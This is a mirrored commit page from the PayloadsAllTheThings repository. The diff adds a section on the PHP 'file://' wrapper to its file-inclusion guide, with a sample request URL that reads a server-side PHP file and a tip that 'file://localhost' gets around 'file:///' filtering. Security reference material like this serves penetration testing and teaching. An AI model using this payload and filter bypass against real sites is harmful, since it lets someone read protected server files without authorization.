wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-24 14:16:22 +02:00
Code Issues Releases Activity

Merge d658aa026a into b245d3cbdd

This commit is contained in:
n3rada 2024-04-22 15:11:34 +02:00 committed by GitHub
parent b245d3cbdd d658aa026a
commit 52ee755ff2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
File Inclusion/README.md
View File

@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
## LFI / RFI using wrappers
### Wrapper file://
It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
```shell
http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
```
Note that using `localhost` above bypasses `file:///` filtering.
### Wrapper php://filter
The part "`php://filter`" is case insensitive